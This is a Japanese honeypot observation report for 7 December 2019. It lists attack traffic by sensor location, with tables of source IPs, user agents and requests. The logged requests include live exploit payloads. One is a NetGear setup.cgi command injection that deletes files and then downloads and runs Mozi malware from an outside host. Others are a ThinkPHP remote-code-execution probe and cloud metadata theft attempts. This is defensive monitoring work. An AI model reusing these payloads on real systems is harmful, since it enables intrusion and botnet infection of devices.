ハニーポット(仮) 観測記録 2019/12/07分です。
特徴
Location:JP
NetGear製品の脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
phpMyAdminに対するスキャン行為
18[.]179[.]20[.]5に関する不正通信
を確認しました。
Location:US
ThinkPHPの脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
FreePBXに対するログイン試行するアクセス
を確認しました。
Location:UK
ThinkPHPの脆弱性を狙うアクセス
Shenzhen TVT製品の脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
FreePBXに対するログイン試行するアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:112 (前日比:+69)
US:総アクセス数:16 (前日比:+6)
UK:総アクセス数:26 (前日比:+1)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 167.172.41.206 | United States |
| 1 | 185.53.88.5 | Netherlands |
| 72 | 23.225.183.234 | United States |
| 1 | 42.231.118.6 | China |
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 66.240.205.34 | United States |
| 1 | 93.49.105.126 | Italy |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 14 | AWS Security Scanner |
| 1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C) |
| 1 | Mozilla/5.0 |
| 72 | python-requests/2.21.0 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | GET | //admin/config.php?password%5B0%5D=bebydviyx&username=admin | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http://169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http://example[.]com/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://42.231.118.6:59643/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 1 | Gh0st\xad | ||
| 1 | POST | //about.php | HTTP/1.1 |
| 1 | POST | //admin/help/zh_cn/database.xml | HTTP/1.1 |
| 4 | POST | //administrator/manifests/files/joomla.xml | HTTP/1.1 |
| 1 | POST | //admin/js/typecho.js | HTTP/1.1 |
| 1 | POST | //admin.php | HTTP/1.1 |
| 1 | POST | //aqb_cc/error/ | HTTP/1.1 |
| 1 | POST | //axis2-web/css/axis-style.css | HTTP/1.1 |
| 1 | POST | //components/com_wrapper/wrapper.xml | HTTP/1.1 |
| 1 | POST | //console/css/login.css | HTTP/1.1 |
| 1 | POST | //css/newcss/login.css | HTTP/1.1 |
| 1 | POST | //Css/Style.css | HTTP/1.1 |
| 1 | POST | //download.php | HTTP/1.1 |
| 1 | POST | //e/tool/feedback/temp/test.txt | HTTP/1.1 |
| 1 | POST | //fckeditor/ | HTTP/1.1 |
| 1 | POST | //forum.php | HTTP/1.1 |
| 1 | POST | //help/io_login.html | HTTP/1.1 |
| 1 | POST | //igenus/login.php | HTTP/1.1 |
| 1 | POST | //Images/ad.js | HTTP/1.1 |
| 1 | POST | //Images/qq/qqkf2/kefu.js | HTTP/1.1 |
| 1 | POST | //include/lib/js/imgareaselect/jquery.imgareaselect.js | HTTP/1.1 |
| 1 | POST | //index.php/chuhades | HTTP/1.1 |
| 1 | POST | //index.php?m=search | HTTP/1.1 |
| 1 | POST | //jcms/ | HTTP/1.1 |
| 1 | POST | //js/browsers.js | HTTP/1.1 |
| 1 | POST | //KS_Inc/ajax.js | HTTP/1.1 |
| 1 | POST | //License/index.php | HTTP/1.1 |
| 1 | POST | //login/applyTheme/css/StyleSheet.css | HTTP/1.1 |
| 1 | POST | //login?from=%2F | HTTP/1.1 |
| 1 | POST | //menu/templates/images/mainmenu_dolphin/A.css | HTTP/1.1 |
| 1 | POST | //phpmyadmin/index.php | HTTP/1.1 |
| 1 | POST | //phpMyAdmin/index.php | HTTP/1.1 |
| 1 | POST | //plugins/authentication/joomla/joomla.xml | HTTP/1.1 |
| 1 | POST | //Public/js/weibologin.js | HTTP/1.1 |
| 1 | POST | //resource/js/cj.js | HTTP/1.1 |
| 20 | POST | //robots.txt | HTTP/1.1 |
| 1 | POST | //script/common.js | HTTP/1.1 |
| 1 | POST | //Script/Html.js | HTTP/1.1 |
| 1 | POST | //script/page.css | HTTP/1.1 |
| 1 | POST | //seeyon/common/js/V3X.js | HTTP/1.1 |
| 1 | POST | //shoppingcart.php | HTTP/1.1 |
| 1 | POST | //SiteFiles/Inner/Register/script.js | HTTP/1.1 |
| 1 | POST | //solr | HTTP/1.1 |
| 1 | POST | //static/js/admincp.js | HTTP/1.1 |
| 1 | POST | //templates/wap/cn/public/footer.html | HTTP/1.1 |
| 1 | POST | /upgrade.aspx?a1=a51599c6 | HTTP/1.1 |
| 1 | POST | //wcm/app/login.jsp | HTTP/1.1 |
| 1 | POST | //webmail/index.php?module=view&action=login | HTTP/1.1 |
| 1 | POST | //webmail/login9.php | HTTP/1.1 |
| 1 | POST | //wp-includes/css/buttons.css | HTTP/1.1 |
| 1 | POST | //wzws-waf-cgi/ | HTTP/1.1 |
| 1 | POST | //yyoa/common/js/javaSeesion.js | HTTP/1.1 |
| 10 | \x16\x03\x01 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 117.157.15.27 | China |
| 10 | 117.50.127.68 | China |
| 1 | 185.128.41.50 | Switzerland |
| 1 | 185.53.88.5 | Netherlands |
| 1 | 220.133.187.251 | Taiwan |
| 2 | 80.82.68.58 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | ApiTool |
| 1 | Go-http-client/1.1 |
| 1 | Java/1.8.0_131 |
| 10 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | //admin/config.php?password%5B0%5D=bebydviyx&username=admin | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 8 | 106.13.148.52 | China |
| 1 | 107.174.14.121 | United States |
| 1 | 112.68.200.246 | Japan |
| 1 | 167.172.41.206 | United States |
| 1 | 175.136.219.105 | Malaysia |
| 1 | 185.128.41.50 | Switzerland |
| 2 | 185.153.196.97 | Republic of Moldova |
| 1 | 185.31.163.237 | Russia |
| 1 | 185.53.88.5 | Netherlands |
| 1 | 186.125.67.182 | Argentina |
| 1 | 39.100.26.13 | China |
| 1 | 59.126.169.33 | Taiwan |
| 1 | 60.191.66.222 | China |
| 1 | 61.219.11.153 | Taiwan |
| 4 | 71.6.167.142 | United States |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 6 | - |
| 2 | ApiTool |
| 1 | Java/1.8.0_131 |
| 1 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C) |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | python-requests/2.10.0 |
| 1 | python-requests/2.6.0 CPython/2.7.5 Linux/3.10.0-1062.4.3.el7.x86_64 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | //admin/config.php?password%5B0%5D=bebydviyx&username=admin | HTTP/1.1 |
| 1 | GET | /admin | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 2 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
| 1 | POST | /images.php | HTTP/1.1 |
| 1 | POST | /upgrade.aspx?a1=a51599c6 | HTTP/1.1 |
